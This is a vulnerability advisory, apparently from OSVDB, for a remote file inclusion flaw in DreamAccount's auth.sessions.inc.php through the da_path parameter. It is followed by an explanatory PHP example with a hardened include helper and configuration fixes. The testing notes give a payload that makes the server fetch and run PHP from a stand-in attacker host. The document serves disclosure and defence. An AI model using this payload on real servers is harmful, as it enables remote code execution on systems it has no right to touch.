DreamAccount auth.sessions.inc.php da_path Variable Remote File Inclusion

2006-06-05T09:49:19
ID OSVDB:26170
Type osvdb
Reporter Aesthetico(admin@majorsecurity.de)
Modified 2006-06-05T09:49:19

Description

Vulnerability Description

DreamAccount contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the auth.sessions.inc.php script not properly sanitizing user input supplied to the 'da_path' variable before using it in an include. This may allow an attacker to include a file from a remote host that contains arbitrary PHP code, which will be executed by the vulnerable script with the privileges of the web server.

Technical Description

This vulnerability is only present when the register_globals PHP option is set to 'on', since that is what lets a request parameter named da_path populate the otherwise uninitialised $da_path variable. This has not been the default setting for PHP installs since version 4.2.0 (22-Apr-2002). Remote inclusion additionally requires allow_url_fopen to be enabled, which was the default in PHP releases of this period; the separate allow_url_include directive did not exist until PHP 5.2.0.

Solution Description

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

Short Description

DreamAccount contains a flaw that may allow a remote attacker to execute arbitrary commands. The issue is due to the auth.sessions.inc.php script not properly sanitizing user input supplied to the 'da_path' variable before using it in an include. This may allow an attacker to include a file from a remote host that contains arbitrary PHP code, which will be executed by the vulnerable script with the privileges of the web server.

Manual Testing Notes

Post data (the trailing '?' turns whatever file name the script appends to da_path into a query string, so the attacker's script is fetched and executed unchanged):

da_path=http://[attacker]/yourscript.php?
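The following PHP is an added illustration of the register_globals include pattern described above and of why the test payload ends in '?'; it is not DreamAccount's code. Only the file name auth.sessions.inc.php and the parameter da_path come from the advisory. The appended suffix 'lib/session.class.php', the function names, and the host attacker.example are assumptions, and the hardened helper is a generic replacement, not a vendor fix. Requires PHP 7 or later.

```php
<?php
// Added example, not DreamAccount's code. auth.sessions.inc.php and da_path
// come from the advisory; the suffix 'lib/session.class.php', the function
// names and the host attacker.example are illustrative assumptions.

// What the vulnerable include effectively computes: a base path that the
// script never initialises (and which register_globals therefore fills from
// the request) concatenated with a fixed file name.
function vulnerable_include_target(string $da_path): string
{
    return $da_path . '/lib/session.class.php';   // suffix is an assumption
}

// Break the resulting string down as PHP's http:// stream wrapper would see
// it, to show where the appended suffix ends up.
function explain_payload(string $da_path): array
{
    $target = vulnerable_include_target($da_path);
    $parts  = parse_url($target);
    $scheme = strtolower($parts['scheme'] ?? '');
    return [
        'target'        => $target,
        'fetched_path'  => $parts['path'] ?? null,   // what the remote server serves
        'ignored_query' => $parts['query'] ?? null,  // the appended suffix, now harmless
        'is_remote'     => in_array($scheme, ['http', 'https', 'ftp'], true),
    ];
}

// Hardened replacement: never take the base directory from the request, and
// refuse anything that is not an existing directory inside the application.
function safe_include_target(string $da_path, string $relative): string
{
    // Reject every stream wrapper (http://, https://, ftp://, php://, data:, phar://, ...).
    if (preg_match('#^[a-z][a-z0-9+.\-]*:#i', $da_path)) {
        throw new InvalidArgumentException('da_path must be a local directory, not a URL or wrapper');
    }
    $app_root = realpath(__DIR__);
    $base     = realpath($da_path);
    if ($app_root === false || $base === false
        || ($base !== $app_root && strpos($base, $app_root . DIRECTORY_SEPARATOR) !== 0)) {
        throw new InvalidArgumentException('da_path must stay inside the application directory');
    }
    // Resolve the final file as well so '..' in $relative cannot escape either.
    $file = realpath($base . DIRECTORY_SEPARATOR . $relative);
    if ($file === false || strpos($file, $app_root . DIRECTORY_SEPARATOR) !== 0) {
        throw new InvalidArgumentException('include target does not exist or escapes the application');
    }
    return $file;
}

if (PHP_SAPI === 'cli') {
    // The advisory's payload, with a concrete host substituted for [attacker].
    $payload = 'http://attacker.example/yourscript.php?';
    var_export(explain_payload($payload));
    echo PHP_EOL;
    try {
        safe_include_target($payload, 'lib/session.class.php');
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Run with the payload, explain_payload() shows that the concatenated target is http://attacker.example/yourscript.php?/lib/session.class.php: the remote server is asked for /yourscript.php and the appended file name survives only as the query string, so whatever PHP the attacker placed in yourscript.php is returned and executed by include. safe_include_target() rejects the same value at the wrapper check before any fetch is attempted. Independently of code changes, an administrator can close this class of issue at deployment time by setting register_globals = Off (for example php_flag register_globals off in .htaccess on Apache with mod_php) and, where nothing legitimately needs remote fopen, allow_url_fopen = Off.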

References:

Vendor URL: http://dreamcost.com/
Secunia Advisory ID: 20468
Related OSVDB ID: 26168
Related OSVDB ID: 26169
Other Advisory URL: http://www.majorsecurity.de/advisory/major_rls8.txt
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-05/0795.html
Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-06/0019.html
Keyword: MajorSecurity #8
ISS X-Force ID: 26932
FrSIRT Advisory: ADV-2006-2152
CVE ID: CVE-2006-2881
Bugtraq ID: 18278